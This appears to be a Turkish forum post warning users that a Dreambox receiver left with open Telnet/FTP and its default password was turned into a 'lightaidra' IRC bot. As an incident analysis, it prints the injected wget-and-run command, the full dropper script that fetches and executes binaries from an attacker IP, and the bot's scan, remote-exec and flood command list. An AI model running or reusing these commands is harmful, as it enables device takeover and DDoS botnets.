Slm Arkadaslar,
dün benim Dreambox 7020HD hacklandigini fark ettim. Onun icin sizi uyarmak istiyorum.
Hack nasil olustu:
Gecenlerde Routerda Telnet/FTP Portunu actim ve Dreamboxa yönlendirdim. Dreambox yeni oldugu icin sifre degismemistim. Isleri hal ettikten sonra Portlari kapatmayi unutmusum. Yaklasik bir hafta acik kaldi.
Hacki nasil fark ettim:
Son günlerde benim Router takilmaya basladi ve Dreambox düzgün yürümedi. Onun icin bakayim dedim, telnet üzeri baglandim ve biraz arastirdim. Su komut benim ilgimi cekti:
Kod:
rm -rf /var/run/getbinaries.sh; wget -c http://108.166.187.75/getbinaries.sh -P /var/run && sh /var/run/getbinaries.sh&
Bu komut ne yapiyor:
/var/run/ klasörde getbinaries.sh dosyasini siliyor, sonra wget komutu ile 108.166.187.75 IP üzeri yeni indirip /var/run klasöre kayit ediyor. En sonunda calistiriyor.
Tabiki ben wget komutu ile incelemek icin bu dosyayi indirdim. Dosyanin icergi söyle:
Kod:
#!/bin/sh
# THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.
# UPLOAD GETBINARIES.SH IN YOUR HTTPD.
# YOUR HTTPD SERVER:
REFERENCE_HTTP="http://108.166.187.75"
# NAME OF BINARIES:
REFERENCE_MIPSEL="mipsel"
REFERENCE_MIPS="mips"
REFERENCE_SUPERH="sh"
REFERENCE_ARM="arm"
REFERENCE_PPC="ppc"
rm -fr /var/run/${REFERENCE_MIPSEL} \
/var/run/${REFERENCE_MIPS} \
/var/run/${REFERENCE_SUPERH} \
/var/run/${REFERENCE_ARM} \
/var/run/${REFERENCE_PPC}
wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPSEL} -P /var/run && chmod +x /var/run/${REFERENCE_MIPSEL} && /var/run/${REFERENCE_MIPSEL}
wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPS} -P /var/run && chmod +x /var/run/${REFERENCE_MIPS} && /var/run/${REFERENCE_MIPS}
wget -c ${REFERENCE_HTTP}/${REFERENCE_ARM} -P /var/run && chmod +x /var/run/${REFERENCE_ARM} && /var/run/${REFERENCE_ARM}
wget -c ${REFERENCE_HTTP}/${REFERENCE_PPC} -P /var/run && chmod +x /var/run/${REFERENCE_PPC} && /var/run/${REFERENCE_PPC}
wget -c ${REFERENCE_HTTP}/${REFERENCE_SUPERH} -P /var/run && chmod +x /var/run/${REFERENCE_SUPERH} && /var/run/${REFERENCE_SUPERH}
sleep 3;
rm -fr /var/run/getbinaries.sh
Bu script ne yapiyor:
Kisacasi 108.166.187.75 IPden 5 tane dosya indiriyor (mipsel,mips,sh,arm ve ppc) sonra /var/run/ klasörde calistirmaya calisiyor. Isimler zaten üstünde. File komutu ile dosyalara bakinca:
Kod:
arm: ELF 32-bit LSB executable, ARM, version 1, statically linked, not stripped
mips: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
mipsel: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
ppc: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, not stripped
sh: ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, not stripped
Tabiki Dreambox 7020HD mipsel (little endian) oldugu icin, mipsel dosyasini calismis.
strings komutu ile bu dosyayi arastirinca benim Dreambox 7020HD'yi bot yapmislar diye fark ettim:
strings komutu kücük parcasi:
Kod:
PRIVMSG %s :* *** Access Commands:
PRIVMSG %s :*
PRIVMSG %s :* .login <password> - login to bot's party-line
PRIVMSG %s :* .logout - logout from bot's party-line
PRIVMSG %s :* *** Miscs Commands
PRIVMSG %s :* .exec <commands> - execute a system command
PRIVMSG %s :* .version - show the current version of bot
PRIVMSG %s :* .status - show the status of bot
PRIVMSG %s :* .help - show this help message
PRIVMSG %s :* *** Scan Commands
PRIVMSG %s :* .advscan <a> <b> <user> <passwd> - scan with user:pass (A.B) classes sets by you
PRIVMSG %s :* .advscan <a> <b> - scan with d-link config reset bug
PRIVMSG %s :* .advscan->recursive <user> <pass> - scan local ip range with user:pass, (C.D) classes random
PRIVMSG %s :* .advscan->recursive - scan local ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random <user> <pass> - scan random ip range with user:pass, (A.B) classes random
PRIVMSG %s :* .advscan->random - scan random ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random->b <user> <pass> - scan local ip range with user:pass, A.(B) class random
PRIVMSG %s :* .advscan->random->b - scan local ip range with d-link config reset bug
PRIVMSG %s :* .stop - stop current operation (scan/dos)
PRIVMSG %s :* *** DDos Commands:
PRIVMSG %s :* NOTE: <port> to 0 = random ports, <ip> to 0 = random spoofing,
PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs
PRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86
PRIVMSG %s :* .spoof <ip> - set the source address ip spoof
PRIVMSG %s :* .synflood <host> <port> <secs> - tcp syn flooder
PRIVMSG %s :* .ngsynflood <host> <port> <secs> - tcp ngsyn flooder (new generation)
PRIVMSG %s :* .ackflood <host> <port> <secs> - tcp ack flooder
PRIVMSG %s :* .ngackflood <host> <port> <secs> - tcp ngack flooder (new generation)
PRIVMSG %s :* *** IRC Commands:
PRIVMSG %s :* .setchan <channel> - set new master channel
PRIVMSG %s :* .join <channel> <password> - join bot in selected room
PRIVMSG %s :* .part <channel> - part bot from selected room
PRIVMSG %s :* .quit - kill the current process
PRIVMSG %s :* *** EOF
JOIN %s :%s
PING 0313370
PRIVMSG %s :[logout] you are logged out!, (%s).
%*s%*s%*s%*s%255[^
PRIVMSG %s :[!exec] error on command: %s
(NULL)
PRIVMSG %s :[exec] result of "%s":
PRIVMSG %s :%s
PRIVMSG %s :[version] lightaidra 0x2012.
PRIVMSG %s :[status] currently not working.
PRIVMSG %s :[status] working on %s
PRIVMSG %s :[spoof] spoofing set as random ip!
PRIVMSG %s :[error] one error in your input data, see help!
PRIVMSG %s :[spoof] spoofing set as ip: %s
advscan scanning range %s.%s.0.0/16 (user:%s pass:%s)
advscan scanning range %s.%s.0.0/16
PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16 (user:%s pass:%s), wait..
PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16, wait..
PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16. wait..
PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16 (user:%s pass:%s). wait..
PRIVMSG %s :[stop] %s was stopped!
operation
QUOTE ZOMBIE
PRIVMSG %s :[chan] %s setted as master channel.
PART %s :%s
Aidra?!
QUIT :pwn!
synflood packeting %s:%u (secs: %u)
PRIVMSG %s :[synflood] start packeting: %s:%u (secs: %u).
ngsynflood packeting %s:%u (secs: %u)
PRIVMSG %s :[ngsynflood] start packeting: %s:%u (secs: %u).
ackflood packeting %s:%u (secs: %u)
PRIVMSG %s :[ackflood] start packeting: %s:%u (secs: %u).
ngackflood packeting %s:%u (secs: %u)
PRIVMSG %s :[ngackflood] start packeting: %s:%u (secs: %u).
/var/run/.lightscan
PRIVMSG %s :[error] unable to open: %s
Strings komutu arastirmak isteyen arkadaslar icin strings.txt dosyasini yükledim.
Hacki silmek icin ne yapmak lazim:
Tabiiki Telnet/FTP portlari kapatmak. Sonra ps komutu ile /var/run/mipsel id'sini ögrenmek ve kill ID ile programi kapatmak. Sonunda rm ile /var/run/mipsel silin. Tabiiki programin kodunu tam bilmedigim icin silmek yeterlimi bilmiyorum. Sizin networke ulasdigi icin tabiiki baska sistemlerede girme imkani var. Ancak program öbür sistemlere bulasiyormu onuda bilemiyorum.
Binary'leri incelemek icin bana PM attin size verebilirim.
Saygilar
Paylaş